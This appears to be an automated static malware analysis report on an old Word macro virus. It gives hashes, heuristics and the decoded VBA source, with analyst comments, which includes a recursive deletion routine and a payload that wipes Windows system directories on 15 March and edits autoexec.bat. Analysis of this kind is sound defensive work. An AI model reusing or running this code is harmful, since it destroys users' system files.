Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9d8987ae0118f4c0…

MALICIOUS

Office (OLE)

42.0 KB Created: 2001-02-23 08:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 360d98bcfb013c8bbe33ba9221ae29ec SHA-1: e7ab5a82a83082fd0acd0779da582b0c0fce2892 SHA-256: 9d8987ae0118f4c0771a7e252615b56ebbdb31da4b88aae8b58de3ab0c13d867
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

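The sample triggers heuristics for OLE VBA macros, including high-severity AutoOpen and AutoClose findings, and carries a critical ClamAV detection as Doc.Trojan.Opey-18. The embedded VBA module 'cyberbug' contains 'DelTree32', a recursive directory-deletion routine that indicates destructive behavior, and 'XCopy32', a recursive directory-copy routine that suggests file copying or exfiltration. In the extracted preview, the 'greetings' routine calls DelTree32 against c:\windows\system and c:\windows\command when the system date is 15 March and then appends echo lines to c:\autoexec.bat; no call to XCopy32 appears in the visible excerpt other than its own recursion, so its role is not confirmed there. The presence of these macros strongly suggests a malicious intent to manipulate or damage the user's file system.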

Heuristics 5

  • ClamAV: Doc.Trojan.Opey-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
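    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: this report also lists decoded VBA source (macros.bas) under Extracted artifacts, so the "no modern VBA project was recovered" condition should be reconciled against that artifact before relying on this finding.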

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27774 bytes
SHA-256: b1addfae99c8803f721c5637787121afa4fb3a3dc809c87155bda661161b0382
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Header of the document module "ThisDocument" as it appears in the extracted macro source.
' Only Attribute lines are shown for this module in the preview; VB_Base refers to
' Normal.ThisDocument and VB_TemplateDerived is True.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Code module "cyberbug": contains the file-system routines and the date-triggered payload.
Attribute VB_Name = "cyberbug"
' Module-level status flag written by DelTree32 and XCopy32. Each routine resets it to False
' on entry and sets it to True when it finishes; their recursive calls read it to decide
' whether to stop early.
Public Success As Boolean
' DelTree32 - analyst notes
' Purpose: recursively deletes the directory DrvLtr & "\" & DeleteDIR, including the files
'          and subdirectories found inside it.
' Parameters:
'   DrvLtr    - drive specifier passed to ChDrive and used as the path prefix (e.g. "c:").
'   DeleteDIR - directory path relative to the drive root, without a leading backslash.
' Result: reported only through the module-level Success flag; nothing is returned.
' Error handling: On Error Resume Next is active for almost the whole routine, so failures
'          in Kill or RmDir are not reported to the caller.
' Defensive relevance: this is the destructive primitive of the sample; the visible caller
'          is greetings(), which passes Windows system directories.
Public Sub DelTree32(DrvLtr As String, DeleteDIR As String)
Dim Result As String
Dim W As Integer
Dim X As Integer
Dim Y As Integer
Dim Z As Integer
Dim DIRList() As String
Dim FileList() As String
' W counts subdirectories collected in DIRList, Y counts files collected in FileList.
W = 0
Y = 0
Success = False
On Error Resume Next
' Bail out quietly (Success stays False) if the drive or the directory cannot be selected.
ChDrive DrvLtr
If Not Err = 0 Then Exit Sub
ChDir (DrvLtr & "\" & DeleteDIR)
If Not Err = 0 Then Exit Sub
ChDrive DrvLtr
' First attempt: remove the directory directly. If RmDir raises no error the work is done.
RmDir ("\" & DeleteDIR)
If Err = 0 Then
    On Error GoTo 0
    Success = True
    Exit Sub
Else
    ' RmDir failed: enumerate the directory contents (vbDirectory makes Dir include
    ' subdirectories as well as files).
    Result = Dir((DrvLtr & "\" & DeleteDIR & "\*.*"), vbDirectory)
    ' Skip the "." and ".." entries at the start of the listing.
    Do
    If (Result = "." Or Result = "..") = False Then
        Exit Do
    Else
        Result = Dir()
    End If
    Loop
    ' Sort every remaining entry into DIRList or FileList until Dir returns "".
    Do
    If Result = "" Then Exit Do
    ' Exact equality test: an entry counts as a directory only when GetAttr returns
    ' exactly vbDirectory; everything else is placed in the file list.
    If (GetAttr(DrvLtr & "\" & DeleteDIR & "\" & Result)) = vbDirectory Then
        W = W + 1
        ReDim Preserve DIRList(W)
        DIRList(W) = Result
    Else
        Y = Y + 1
        ReDim Preserve FileList(Y)
        FileList(Y) = Result
    End If
    Result = Dir()
    Loop
    ' All names are collected before recursing. Each recursive call resets Success, and
    ' the walk stops as soon as one subdirectory call leaves it False.
    For X = 1 To W
        Call DelTree32(DrvLtr, (DeleteDIR & "\" & DIRList(X)))
        If Success = False Then Exit Sub
    Next X
    ' Delete the files in this directory; errors from Kill are suppressed.
    For Z = 1 To Y
        Kill (DrvLtr & "\" & DeleteDIR & "\" & FileList(Z))
    Next Z
    ChDrive DrvLtr
    RmDir ("\" & DeleteDIR)
    ' Success is set to True without checking whether the final RmDir worked.
    Success = True
    On Error GoTo 0
End If
End Sub

' XCopy32 - analyst notes
' Purpose: recursively copies the directory SourceDrv & "\" & SourceDIR, with its files and
'          subdirectories, to DestDrv & "\" & DestDIR, creating the destination directory
'          when ChDir into it fails.
' Parameters:
'   SourceDrv / SourceDIR - drive specifier and root-relative path of the tree to copy.
'   DestDrv / DestDIR     - drive specifier and root-relative path of the target; DestDIR
'                           is Optional.
' Result: reported only through the module-level Success flag.
' Error handling: errors are suppressed during the drive/directory setup only; On Error
'          GoTo 0 switches this procedure's handler off before enumeration and copying.
' Defensive relevance: no caller of XCopy32 other than its own recursion is visible in the
'          extracted preview (the listing is truncated), so its use by the sample is
'          unconfirmed from this excerpt.
Public Sub XCopy32(SourceDrv As String, SourceDIR As String, DestDrv As String, Optional DestDIR As String)
Dim Result As String
Dim W As Integer
Dim X As Integer
Dim Y As Integer
Dim Z As Integer
Dim DIRList() As String
Dim FileList() As String
' W counts subdirectories collected in DIRList, Y counts files collected in FileList.
W = 0
Y = 0
Success = False
On Error Resume Next
' Exit quietly (Success stays False) if the source drive or directory cannot be selected.
ChDrive SourceDrv
If Not Err = 0 Then Exit Sub
ChDir (SourceDrv & "\" & SourceDIR)
If Not Err = 0 Then Exit Sub
ChDrive DestDrv
If Not Err = 0 Then Exit Sub
' If the destination directory cannot be entered, clear the error and try to create it.
ChDir (DestDrv & "\" & DestDIR)
If Not Err = 0 Then
    Err = 0
    MkDir (DestDrv & "\" & DestDIR)
    If Not Err = 0 Then Exit Sub
End If
On Error GoTo 0
' Enumerate the source directory (vbDirectory makes Dir include subdirectories).
Result = Dir((SourceDrv & "\" & SourceDIR & "\*.*"), vbDirectory)
' Skip the "." and ".." entries at the start of the listing.
Do
If (Result = "." Or Result = "..") = False Then
    Exit Do
Else
    Result = Dir()
End If
Loop
' Sort every remaining entry into DIRList or FileList until Dir returns "".
Do
If Result = "" Then Exit Do
' Exact equality test: an entry counts as a directory only when GetAttr returns exactly
' vbDirectory; everything else is placed in the file list.
If (GetAttr(SourceDrv & "\" & SourceDIR & "\" & Result)) = vbDirectory Then
    W = W + 1
    ReDim Preserve DIRList(W)
    DIRList(W) = Result
Else
    Y = Y + 1
    ReDim Preserve FileList(Y)
    FileList(Y) = Result
End If
Result = Dir()
Loop
' Recurse into each subdirectory, mirroring its name under the destination; stop as soon
' as one recursive call leaves Success False.
For X = 1 To W
    Call XCopy32(SourceDrv, (SourceDIR & "\" & DIRList(X)), DestDrv, (DestDIR & "\" & DIRList(X)))
    If Success = False Then Exit Sub
Next X
' Copy the files of this directory under the same names.
For Z = 1 To Y
    FileCopy (SourceDrv & "\" & SourceDIR & "\" & FileList(Z)), (DestDrv & "\" & DestDIR & "\" & FileList(Z))
Next Z
Success = True
End Sub
' greetings - analyst notes
' Purpose: date-triggered payload. When the system date is 15 March it calls DelTree32 on
'          c:\windows\system and c:\windows\command and then appends a batch snippet to
'          c:\autoexec.bat. On any other date line1$ stays empty and nothing is written.
' Error handling: On Error Resume Next suppresses every failure, so a failed delete or
'          file write produces no visible error.
' Host indicators visible in this routine: appended "@echo off" / echo / "pause" lines in
'          c:\autoexec.bat, including the literal strings below, and missing contents
'          under the two targeted directories.
' NOTE(review): the caller of greetings is not visible in the extracted preview; the report
'          flags AutoOpen/AutoClose macros, but the wiring is not shown here - confirm
'          against the full macro source.
' NOTE(review): the targeted paths look like a Windows 9x-era layout - confirm.
Sub greetings()
    On Error Resume Next
        autoexecfile$ = "c:\autoexec.bat"
        ' FreeFile supplies the file number later used by Open / Print / Close.
        hFile = FreeFile
        line1$ = ""
        line2$ = "echo I think your system just crashed !!!!!"
            ' Trigger condition: month 3, day 15 of the local system date.
            If (Month(Date) = 3) And (Day(Date) = 15) Then
                line1$ = "echo It's MICO's Birthday and he has a gift for you .."
                ' Destructive step: recursive deletion of two Windows directories.
                Call DelTree32("c:", "windows\system")
                Call DelTree32("c:", "windows\command")
                End If
                      
            ' line1$ is non-empty only when the date trigger fired, so the autoexec.bat
            ' modification happens on the same day as the deletion.
            If line1$ <> "" Then
                    ' Append mode: existing autoexec.bat content is kept and the lines
                    ' below are added after it.
                    Open autoexecfile$ For Append Access Write As hFile
                        Print #hFile, "@echo off"
                        Print #hFile, line1$
                        Print #hFile, "echo  hahahahahahaha !!!!!"
                        Print #hFile, line2$
                        Print #hFile, "echo from: CYBER"
                        Print #hFile, "pause"
                    Close hFile
                End If
End Sub
Sub OnlyYou(
... (truncated)